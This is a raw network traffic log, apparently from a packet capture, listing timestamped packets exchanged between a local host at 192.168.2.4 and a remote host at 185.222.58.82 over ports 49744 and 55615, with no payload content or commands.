Dec 4, 2024 13:17:30.497740030 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.497752905 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.497775078 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.497801065 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.497802973 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.497839928 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.497848988 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.497859001 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.497895956 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.498024940 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.498034954 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.498086929 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.498116016 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.498131990 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.498162985 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.498181105 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.498218060 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.498229027 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.498280048 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.498285055 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.498301029 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.498347044 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.498785019 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.498802900 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.498836040 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.498847008 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.498872995 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.498888016 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.498929024 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.499289036 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.499325991 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.499341965 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.499377012 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.499425888 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.499434948 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.499481916 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.499527931 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.499546051 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.499583960 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.499607086 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.499624014 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.499633074 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.499672890 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.499682903 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.499691963 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.499723911 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.499739885 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.499854088 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.499866009 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.499919891 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.499957085 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.499967098 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.500015974 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.500097990 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.500108957 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.500153065 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.500183105 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.500226974 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.500245094 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.500255108 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.500276089 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.500318050 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.500468969 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.500478983 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.500488043 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.500504971 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.500521898 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.500546932 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.500557899 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.500572920 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.500582933 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.500624895 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.501075029 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.501084089 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.501127005 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.501184940 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.501197100 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.501243114 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.501301050 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.501323938 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.501348019 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.501379013 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.501451015 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.501461029 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.501504898 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.501507998 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.501518965 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.501566887 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.501657009 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.501676083 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.501709938 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.501724958 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.501744032 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.501754045 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.501794100 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.501796007 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.501852036 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.501871109 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.501905918 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.501914978 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.501919985 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.501955986 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.502032995 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.502074957 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.502079964 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.502125025 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.502135992 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.502166986 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.502173901 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.502212048 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.502274990 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.502283096 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.502326965 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.502337933 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.502348900 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.502367020 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.502387047 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.502417088 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.502423048 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.502513885 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.502707005 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.502762079 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.502772093 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.502796888 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.502805948 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.502808094 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.502846956 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.502952099 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.502990007 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.502999067 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.503048897 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.503499985 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.503509998 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.503561974 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.503586054 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.503596067 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.503643036 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.505450010 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.505513906 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.505594969 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.505604029 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.505666971 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.505676031 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.505724907 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.505733013 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.506444931 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.506455898 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.506490946 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.506500006 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.506575108 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.506583929 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.506666899 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.506675959 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.507688999 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.507698059 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.507807970 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.507812023 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.507886887 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.507931948 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.508018970 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.508028984 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.508126020 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.508135080 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.509203911 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.509212971 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.509257078 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.509267092 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.509387016 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.509426117 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.509488106 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.509496927 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.509537935 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.509547949 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.510010958 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.510118008 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.510185003 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.510241032 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.510251999 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.510322094 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.510409117 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.510485888 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.510494947 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.510584116 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.510639906 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.510788918 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.510833025 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.510961056 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.510971069 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.511092901 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.511112928 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.511153936 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.511219978 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.511358023 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.511367083 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.511389017 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.511442900 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.511488914 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.511581898 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.511668921 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.511678934 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.511787891 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.511797905 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.511857986 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.511868000 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.511926889 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.512048006 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.512058020 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.512099981 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.512157917 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.512167931 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.512203932 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.512257099 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.512360096 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.512368917 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.512412071 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.512428999 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.512478113 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.512528896 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.512587070 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.512595892 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.512654066 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.512664080 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.512734890 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.512744904 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.512793064 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.512803078 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.512850046 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.512859106 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.512906075 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.512959003 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.512968063 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.513017893 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.513026953 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.513076067 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.513094902 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.513142109 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.513185978 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.513257980 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.513267040 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.513303041 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.513312101 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.513376951 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.513386965 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.513509035 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.513524055 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.513533115 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.513597012 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.513607025 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.513621092 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.543982983 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.544779062 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.544786930 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.545170069 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.572499037 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.572518110 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.572642088 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.572653055 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.572689056 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.573848009 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.573857069 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.574618101 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.617372036 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.617396116 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.617449999 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.617459059 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.617501974 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.617547035 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.617656946 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.617676973 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.617793083 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.617801905 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.617918015 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.617938042 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.618105888 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.618171930 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.618180990 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.618220091 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.618305922 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.618376017 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.618570089 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.618576050 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.618623972 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.618633032 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.618750095 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.618762016 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.618848085 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.618869066 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.618962049 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.618971109 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.618988037 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.619005919 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.619061947 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.619106054 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.619219065 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.619265079 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.619309902 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.619329929 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.619442940 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.619452000 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.619505882 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.619513988 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.619625092 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.619633913 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.619673014 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.619683027 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.619807005 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.619815111 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.619836092 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.619844913 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.619862080 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.619870901 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.619885921 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.619895935 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.619951963 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.619962931 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.620009899 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.620048046 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.620188951 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.620198965 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.620424986 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.620434999 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.620635986 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.620645046 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.620795012 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.620805025 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.620990992 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.621000051 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.621093988 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.621103048 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.621314049 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.621324062 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.621411085 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.621421099 CET	55615	49744	185.222.58.82	192.168.2.4
